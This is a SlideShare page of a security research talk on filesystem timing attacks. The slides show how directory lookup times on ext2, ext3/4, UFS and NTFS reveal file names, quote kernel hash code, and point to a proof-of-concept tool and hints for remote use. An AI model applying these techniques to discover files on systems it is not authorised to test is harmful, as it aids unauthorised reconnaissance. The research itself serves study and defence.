SlideShare ist ein Scribd-Unternehmen logo

Filesystems timing attacks

Wallarm
Wallarm

Gathering information about the file system is the primary method of black box security audits. The classical method of this attack is dirbusting - brute force files and directories full names to obtain their contents. In this paper author consider new methods of attack, based on timings, which can significantly reduce the time to observing files and directories. Classic divergent bruteforce problems are reduced to convergent analogue of search. Timing techniques are investigated for both hardware and for software. Also, the author researched overall theory of such effects.

TechnologieBusiness
1 von 29
Downloaden Sie, um offline zu lesen
Filesystems timing attacks ZeroNights, Moscow, 08/11/13 research
Timing attacks basics time to execution of Function(UserData,PrivateData) depends from UserData and PrivateData this time can be use to determine PrivateData by UserData
Filesystems timing attacks What is Function(UserData,PrivateData) ? Basically - STAT, but not only
FS timing attacks intro execution time of search operation depends on: ● search string ● data on which searches for attack concept is determine data by timings on different search strings
FS timing attacks intro execution time of search operation depends on: ● search string ● data on which searches for attack concept is determine data by timings on different search strings
Filesystems search basics Directory indexing mechanism ● list ● BTree (not binary tree) ● HTree + cache mechanism
Filesystem Directory indexing algo Hash type Cache ext2 list - + ext3/4 htree half_md4 + seed (earlier Legacy, TEA) + ufs2/NFS dirhash FNV (FreeBSD) DJB (OpenBSD) + FAT list (btree) - + NTFS btree - +
To cache or not to cache ● Cache does not prevent timing attacks ● Cache remove disk operations noises
ext2 lists To find a file, the directory is searched front-to-back for the associated filename HTree indexes were originally developed for ext2 but the patch never made it to the official branch. The dir_index feature can be enabled when creating an ext2 filesystem, but the ext2 code won't act on it.
ext2 lists ./fs/ext2/dir.c: static inline int ext2_match (int len, const char * const name, struct ext2_dir_entry_2 * de) { if (len != de->name_len) return 0; if (!de->inode) return 0; return !memcmp(name, de->name, len); } Timing anomaly for files with unexisting length
ext2 results 10 loops 100k STATS/loop Time(compared bytes)
OPTIMIZATION
ext3/4 HTree ./fs/ext3/hash.c: ext3fs_dirhash * Returns the hash of a filename. If len is 0 and name is NULL, then * this function can be used to test whether or not a hash version is * supported. * * The seed is an 4 longword (32 bits) "secret" which can be used to * uniquify a hash. If the seed is all zero's, then some default seed * may be used.
ext3/4 HTree 4x32 bites = 16 bytes - impossible to brute force ;( ./fs/ext3/hash.c: ext3fs_dirhash * Returns the hash of a filename. If len is 0 and name is NULL, then * this function can be used to test whether or not a hash version is * supported. * * The seed is an 4 longword (32 bits) "secret" which can be used to * uniquify a hash. If the seed is all zero's, then some default seed * may be used.
ext3/4 predicted seed ● Usefull while filesystem comes from firmware image ● All devices with same firmwares has the same seeds
What hash type used ext3/4 ? man tune2fs hash_alg=hash-alg Set the default hash algorithm used for filesystems with hashed b-tree directories. Valid algorithms accepted are: legacy, half_md4, and tea. half_md4 by default
ext3/4 MD4 hash tricks mkfs.ext3/4 seed from /dev/urandom p = name; while (len > 0) { (*str2hashbuf)(p, len, in, 8); half_md4_transform(buf, in); len -= 32; seed, 16 bytes (4x32 bits long) “secret” p += 32; } minor_hash = buf[2]; hash = buf[1]; break; 128 bit of state require to calculate next hashes
ext3/4 MD4 hash tricks MD4($salt.$filename) - really? If you know MD4($salt.”a”) You know MD4($salt.”a”.$postfix) W/o knowledge about $salt value ! What is $salt? Seed which unique for whole current filesystem (all folders)
ext3/4 legacy hash static __u32 dx_hack_hash_signed(const char *name, int len) { __u32 hash, hash0 = 0x12a3fe2d, hash1 = 0x37abe8f9; const signed char *scp = (const signed char *) name; while (len--) { hash = hash1 + (hash0 ^ (((int) *scp++) * 7152373)); if (hash & 0x80000000) hash -= 0x7fffffff; hash1 = hash0; hash0 = hash; } return hash0 << 1; }
Binary search for timing attack ext3_find_entry -> ext3_dx_find_entry -> dx_probe: p = entries + 1; q = entries + count - 1; while (p <= q) { m = p + (q - p)/2; dxtrace(printk(".")); if (dx_get_hash(m) > hash) q = m - 1; else p = m + 1; } 1. min_hash <= hash <= max_hash 2. (max-min)/2 <= hash 3. ... T=T1+T2+T3+T4 T1 T2 T3 T4
ufs2/NFS FNV hash - no seed/salt! static __inline Fnv32_t fnv_32_buf(const void *buf, size_t len, Fnv32_t hval) { const u_int8_t *s = (const u_int8_t *)buf; while (len-- != 0) { hval *= FNV_32_PRIME; hval ^= *s++; } return hval; }
ufs2/NFS DJB hash - no seed/salt! #define HASHINIT 5381 #define HASHSTEP(x,c) (((x << 5) + x) + (c)) hash32_buf(const void *buf, size_t len, uint32_t hash) { const unsigned char *p = buf; while (len--) hash = HASHSTEP(hash, *p++); return hash; }
UFS search by filename ufs_lookup -> ufs_lookup_ino: switch (ufsdirhash_lookup(dp, cnp>cn_nameptr, cnp->cn_namelen, &i_offset, &bp, nameiop == DELETE ? &prevoff : NULL)) { case 0: ep = (struct direct *)((char *)bp->b_data + (i_offset & bmask)); goto foundentry; case ENOENT: i_offset = roundup2(dp->i_size, DIRBLKSIZ); goto notfound; default: break; ufsdirhash_lookup: ... for (; (offset = DH_ENTRY(dh, slot)) != DIRHASH_EMPTY; slot = WRAPINCR(slot, dh->dh_hlen)) { ... if (dp->d_namlen == namelen && bcmp(dp->d_name, name, namelen) == 0) { /* Found. Get the prev offset if needed. */ if (prevoffp != NULL) { if (offset & (DIRBLKSIZ - 1)) { prevoff = ufsdirhash_getprev(dp, offset); if (prevoff == -1) { error = EJUSTRETURN; goto fail; } } else ...
FAT/NTFS results ● BTree + binary search - no hashes, no problems ;) ● Just test using PoC from github
PoC ● Simple tool that can demonstrate timing anomaly ● Just PoC, not a framework ● Framework soon ;) https://github. com/wallarm/researches/blob/master/fstiming/fs-timing.c
Remote attacks ● Network noises ● Lack of opportunity to request multiple files in same loop ● But you can use additional features: ○ CPU overload ○ inodes count I think you know ○ memory usage how to do it remotely ;)
Real case from a wild ● ● ● ● ● TFTP service Classic bruteforce w/o results Times to retrieve files are different Sort it! Find prefixes with anomaly timings: ○ rom○ firmware. ○ … ● Brute filename after prefixes
Next steps ● And... YES! ● We want to optimize classic DirBusting technology ● For bruteforce to search through timing-attacks!
The end Contacts: @wallarm, @d0znpp http://github.com/wallarm no+SQL timing attacks at: research

Empfohlen

Compact ordered dict__k_lab_meeting_
Compact ordered dict__k_lab_meeting_Compact ordered dict__k_lab_meeting_
Compact ordered dict__k_lab_meeting_miki koganei
 
Php7 hashtable
Php7 hashtablePhp7 hashtable
Php7 hashtable桐 王
 
The TCP/IP stack in the FreeBSD kernel COSCUP 2014
The TCP/IP stack in the FreeBSD kernel COSCUP 2014The TCP/IP stack in the FreeBSD kernel COSCUP 2014
The TCP/IP stack in the FreeBSD kernel COSCUP 2014Kevin Lo
 
Glusterfs session #13 replication introduction
Glusterfs session #13 replication introductionGlusterfs session #13 replication introduction
Glusterfs session #13 replication introductionPranith Karampuri
 
Sysprog17
Sysprog17Sysprog17
Sysprog17Ahmed Mekkawy
 
Unix v6 セミナー vol. 5
Unix v6 セミナー vol. 5Unix v6 セミナー vol. 5
Unix v6 セミナー vol. 5magoroku Yamamoto
 
file handling1
file handling1file handling1
file handling1student
 
All'ombra del Leviatano: Filesystem in Userspace
All'ombra del Leviatano: Filesystem in UserspaceAll'ombra del Leviatano: Filesystem in Userspace
All'ombra del Leviatano: Filesystem in UserspaceRoberto Reale
 

Empfohlen

Compact ordered dict__k_lab_meeting_
Compact ordered dict__k_lab_meeting_Compact ordered dict__k_lab_meeting_
Compact ordered dict__k_lab_meeting_miki koganei
 
Php7 hashtable
Php7 hashtablePhp7 hashtable
Php7 hashtable桐 王
 
The TCP/IP stack in the FreeBSD kernel COSCUP 2014
The TCP/IP stack in the FreeBSD kernel COSCUP 2014The TCP/IP stack in the FreeBSD kernel COSCUP 2014
The TCP/IP stack in the FreeBSD kernel COSCUP 2014Kevin Lo
 
Glusterfs session #13 replication introduction
Glusterfs session #13 replication introductionGlusterfs session #13 replication introduction
Glusterfs session #13 replication introductionPranith Karampuri
 
Sysprog17
Sysprog17Sysprog17
Sysprog17Ahmed Mekkawy
 
Unix v6 セミナー vol. 5
Unix v6 セミナー vol. 5Unix v6 セミナー vol. 5
Unix v6 セミナー vol. 5magoroku Yamamoto
 
file handling1
file handling1file handling1
file handling1student
 
All'ombra del Leviatano: Filesystem in Userspace
All'ombra del Leviatano: Filesystem in UserspaceAll'ombra del Leviatano: Filesystem in Userspace
All'ombra del Leviatano: Filesystem in UserspaceRoberto Reale
 
Writing file system in CPython
Writing file system in CPythonWriting file system in CPython
Writing file system in CPythondelimitry
 
Vfs
VfsVfs
VfsWaqas !!!!
 
Sysprog 16
Sysprog 16Sysprog 16
Sysprog 16Ahmed Mekkawy
 
Boostライブラリ一周の旅
Boostライブラリ一周の旅 Boostライブラリ一周の旅
Boostライブラリ一周の旅 Akira Takahashi
 
(No)SQL Timing Attacks for Data Retrieval
(No)SQL Timing Attacks for Data Retrieval(No)SQL Timing Attacks for Data Retrieval
(No)SQL Timing Attacks for Data RetrievalPositive Hack Days
 
Unix-module3.pptx
Unix-module3.pptxUnix-module3.pptx
Unix-module3.pptxssuser8594b8
 
The TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelThe TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelDivye Kapoor
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus AnalysisGangSeok Lee
 
why we need ext4
why we need ext4why we need ext4
why we need ext4Hao(Robin) Dong
 
Gsummit apis-2013
Gsummit apis-2013Gsummit apis-2013
Gsummit apis-2013Gluster.org
 
File management
File managementFile management
File managementMohammed Sikander
 
Threads Advance in System Administration with Linux
Threads Advance in System Administration with LinuxThreads Advance in System Administration with Linux
Threads Advance in System Administration with LinuxSoumen Santra
 
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docx
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docxLab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docx
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docxDIPESH30
 
Root file system
Root file systemRoot file system
Root file systemBindu U
 
11 linux filesystem copy
11 linux filesystem copy11 linux filesystem copy
11 linux filesystem copyShay Cohen
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and DriversKernel TLV
 
Shared_memory_hash_table
Shared_memory_hash_tableShared_memory_hash_table
Shared_memory_hash_tableRussell Childs
 
Hash function landscape
Hash function landscapeHash function landscape
Hash function landscapeSandeep Joshi
 
Glusterfs session #2 1 layer above disk filesystems
Glusterfs session #2 1 layer above disk filesystemsGlusterfs session #2 1 layer above disk filesystems
Glusterfs session #2 1 layer above disk filesystemsPranith Karampuri
 
ext2-110628041727-phpapp02
ext2-110628041727-phpapp02ext2-110628041727-phpapp02
ext2-110628041727-phpapp02Hao(Robin) Dong
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 

Weitere ähnliche Inhalte

Ähnlich wie Filesystems timing attacks

Writing file system in CPython
Writing file system in CPythonWriting file system in CPython
Writing file system in CPythondelimitry
 
Boostライブラリ一周の旅
Boostライブラリ一周の旅 Boostライブラリ一周の旅
Boostライブラリ一周の旅 Akira Takahashi
 
(No)SQL Timing Attacks for Data Retrieval
(No)SQL Timing Attacks for Data Retrieval(No)SQL Timing Attacks for Data Retrieval
(No)SQL Timing Attacks for Data RetrievalPositive Hack Days
 
The TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelThe TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelDivye Kapoor
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus AnalysisGangSeok Lee
 
Gsummit apis-2013
Gsummit apis-2013Gsummit apis-2013
Gsummit apis-2013Gluster.org
 
Threads Advance in System Administration with Linux
Threads Advance in System Administration with LinuxThreads Advance in System Administration with Linux
Threads Advance in System Administration with LinuxSoumen Santra
 
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docx
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docxLab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docx
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docxDIPESH30
 
Root file system
Root file systemRoot file system
Root file systemBindu U
 
11 linux filesystem copy
11 linux filesystem copy11 linux filesystem copy
11 linux filesystem copyShay Cohen
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and DriversKernel TLV
 
Shared_memory_hash_table
Shared_memory_hash_tableShared_memory_hash_table
Shared_memory_hash_tableRussell Childs
 
Hash function landscape
Hash function landscapeHash function landscape
Hash function landscapeSandeep Joshi
 
Glusterfs session #2 1 layer above disk filesystems
Glusterfs session #2 1 layer above disk filesystemsGlusterfs session #2 1 layer above disk filesystems
Glusterfs session #2 1 layer above disk filesystemsPranith Karampuri
 
ext2-110628041727-phpapp02
ext2-110628041727-phpapp02ext2-110628041727-phpapp02
ext2-110628041727-phpapp02Hao(Robin) Dong
 

Ähnlich wie Filesystems timing attacks (20)

Writing file system in CPython
Writing file system in CPythonWriting file system in CPython
Writing file system in CPython
 
Vfs
VfsVfs
Vfs
 
Sysprog 16
Sysprog 16Sysprog 16
Sysprog 16
 
Boostライブラリ一周の旅
Boostライブラリ一周の旅 Boostライブラリ一周の旅
Boostライブラリ一周の旅
 
(No)SQL Timing Attacks for Data Retrieval
(No)SQL Timing Attacks for Data Retrieval(No)SQL Timing Attacks for Data Retrieval
(No)SQL Timing Attacks for Data Retrieval
 
Unix-module3.pptx
Unix-module3.pptxUnix-module3.pptx
Unix-module3.pptx
 
The TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux KernelThe TCP/IP Stack in the Linux Kernel
The TCP/IP Stack in the Linux Kernel
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
 
why we need ext4
why we need ext4why we need ext4
why we need ext4
 
Gsummit apis-2013
Gsummit apis-2013Gsummit apis-2013
Gsummit apis-2013
 
File management
File managementFile management
File management
 
Threads Advance in System Administration with Linux
Threads Advance in System Administration with LinuxThreads Advance in System Administration with Linux
Threads Advance in System Administration with Linux
 
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docx
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docxLab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docx
Lab01Filesbuild.bat@echo offclsset DRIVE_LETTER=1.docx
 
Root file system
Root file systemRoot file system
Root file system
 
11 linux filesystem copy
11 linux filesystem copy11 linux filesystem copy
11 linux filesystem copy
 
FreeBSD and Drivers
FreeBSD and DriversFreeBSD and Drivers
FreeBSD and Drivers
 
Shared_memory_hash_table
Shared_memory_hash_tableShared_memory_hash_table
Shared_memory_hash_table
 
Hash function landscape
Hash function landscapeHash function landscape
Hash function landscape
 
Glusterfs session #2 1 layer above disk filesystems
Glusterfs session #2 1 layer above disk filesystemsGlusterfs session #2 1 layer above disk filesystems
Glusterfs session #2 1 layer above disk filesystems
 
ext2-110628041727-phpapp02
ext2-110628041727-phpapp02ext2-110628041727-phpapp02
ext2-110628041727-phpapp02
 

Kürzlich hochgeladen

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 

Kürzlich hochgeladen (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 

Filesystems timing attacks

  • 2. Timing attacks basics time to execution of Function(UserData,PrivateData) depends from UserData and PrivateData this time can be use to determine PrivateData by UserData
  • 3. Filesystems timing attacks What is Function(UserData,PrivateData) ? Basically - STAT, but not only
  • 4. FS timing attacks intro execution time of search operation depends on: ● search string ● data on which searches for attack concept is determine data by timings on different search strings
  • 5. FS timing attacks intro execution time of search operation depends on: ● search string ● data on which searches for attack concept is determine data by timings on different search strings
  • 6. Filesystems search basics Directory indexing mechanism ● list ● BTree (not binary tree) ● HTree + cache mechanism
  • 7. Filesystem Directory indexing algo Hash type Cache ext2 list - + ext3/4 htree half_md4 + seed (earlier Legacy, TEA) + ufs2/NFS dirhash FNV (FreeBSD) DJB (OpenBSD) + FAT list (btree) - + NTFS btree - +
  • 8. To cache or not to cache ● Cache does not prevent timing attacks ● Cache remove disk operations noises
  • 9. ext2 lists To find a file, the directory is searched front-to-back for the associated filename HTree indexes were originally developed for ext2 but the patch never made it to the official branch. The dir_index feature can be enabled when creating an ext2 filesystem, but the ext2 code won't act on it.
  • 10. ext2 lists ./fs/ext2/dir.c: static inline int ext2_match (int len, const char * const name, struct ext2_dir_entry_2 * de) { if (len != de->name_len) return 0; if (!de->inode) return 0; return !memcmp(name, de->name, len); } Timing anomaly for files with unexisting length
  • 11. ext2 results 10 loops 100k STATS/loop Time(compared bytes)
  • 13. ext3/4 HTree ./fs/ext3/hash.c: ext3fs_dirhash * Returns the hash of a filename. If len is 0 and name is NULL, then * this function can be used to test whether or not a hash version is * supported. * * The seed is an 4 longword (32 bits) "secret" which can be used to * uniquify a hash. If the seed is all zero's, then some default seed * may be used.
  • 14. ext3/4 HTree 4x32 bites = 16 bytes - impossible to brute force ;( ./fs/ext3/hash.c: ext3fs_dirhash * Returns the hash of a filename. If len is 0 and name is NULL, then * this function can be used to test whether or not a hash version is * supported. * * The seed is an 4 longword (32 bits) "secret" which can be used to * uniquify a hash. If the seed is all zero's, then some default seed * may be used.
  • 15. ext3/4 predicted seed ● Usefull while filesystem comes from firmware image ● All devices with same firmwares has the same seeds
  • 16. What hash type used ext3/4 ? man tune2fs hash_alg=hash-alg Set the default hash algorithm used for filesystems with hashed b-tree directories. Valid algorithms accepted are: legacy, half_md4, and tea. half_md4 by default
  • 17. ext3/4 MD4 hash tricks mkfs.ext3/4 seed from /dev/urandom p = name; while (len > 0) { (*str2hashbuf)(p, len, in, 8); half_md4_transform(buf, in); len -= 32; seed, 16 bytes (4x32 bits long) “secret” p += 32; } minor_hash = buf[2]; hash = buf[1]; break; 128 bit of state require to calculate next hashes
  • 18. ext3/4 MD4 hash tricks MD4($salt.$filename) - really? If you know MD4($salt.”a”) You know MD4($salt.”a”.$postfix) W/o knowledge about $salt value ! What is $salt? Seed which unique for whole current filesystem (all folders)
  • 19. ext3/4 legacy hash static __u32 dx_hack_hash_signed(const char *name, int len) { __u32 hash, hash0 = 0x12a3fe2d, hash1 = 0x37abe8f9; const signed char *scp = (const signed char *) name; while (len--) { hash = hash1 + (hash0 ^ (((int) *scp++) * 7152373)); if (hash & 0x80000000) hash -= 0x7fffffff; hash1 = hash0; hash0 = hash; } return hash0 << 1; }
  • 20. Binary search for timing attack ext3_find_entry -> ext3_dx_find_entry -> dx_probe: p = entries + 1; q = entries + count - 1; while (p <= q) { m = p + (q - p)/2; dxtrace(printk(".")); if (dx_get_hash(m) > hash) q = m - 1; else p = m + 1; } 1. min_hash <= hash <= max_hash 2. (max-min)/2 <= hash 3. ... T=T1+T2+T3+T4 T1 T2 T3 T4
  • 21. ufs2/NFS FNV hash - no seed/salt! static __inline Fnv32_t fnv_32_buf(const void *buf, size_t len, Fnv32_t hval) { const u_int8_t *s = (const u_int8_t *)buf; while (len-- != 0) { hval *= FNV_32_PRIME; hval ^= *s++; } return hval; }
  • 22. ufs2/NFS DJB hash - no seed/salt! #define HASHINIT 5381 #define HASHSTEP(x,c) (((x << 5) + x) + (c)) hash32_buf(const void *buf, size_t len, uint32_t hash) { const unsigned char *p = buf; while (len--) hash = HASHSTEP(hash, *p++); return hash; }
  • 23. UFS search by filename ufs_lookup -> ufs_lookup_ino: switch (ufsdirhash_lookup(dp, cnp>cn_nameptr, cnp->cn_namelen, &i_offset, &bp, nameiop == DELETE ? &prevoff : NULL)) { case 0: ep = (struct direct *)((char *)bp->b_data + (i_offset & bmask)); goto foundentry; case ENOENT: i_offset = roundup2(dp->i_size, DIRBLKSIZ); goto notfound; default: break; ufsdirhash_lookup: ... for (; (offset = DH_ENTRY(dh, slot)) != DIRHASH_EMPTY; slot = WRAPINCR(slot, dh->dh_hlen)) { ... if (dp->d_namlen == namelen && bcmp(dp->d_name, name, namelen) == 0) { /* Found. Get the prev offset if needed. */ if (prevoffp != NULL) { if (offset & (DIRBLKSIZ - 1)) { prevoff = ufsdirhash_getprev(dp, offset); if (prevoff == -1) { error = EJUSTRETURN; goto fail; } } else ...
  • 24. FAT/NTFS results ● BTree + binary search - no hashes, no problems ;) ● Just test using PoC from github
  • 25. PoC ● Simple tool that can demonstrate timing anomaly ● Just PoC, not a framework ● Framework soon ;) https://github. com/wallarm/researches/blob/master/fstiming/fs-timing.c
  • 26. Remote attacks ● Network noises ● Lack of opportunity to request multiple files in same loop ● But you can use additional features: ○ CPU overload ○ inodes count I think you know ○ memory usage how to do it remotely ;)
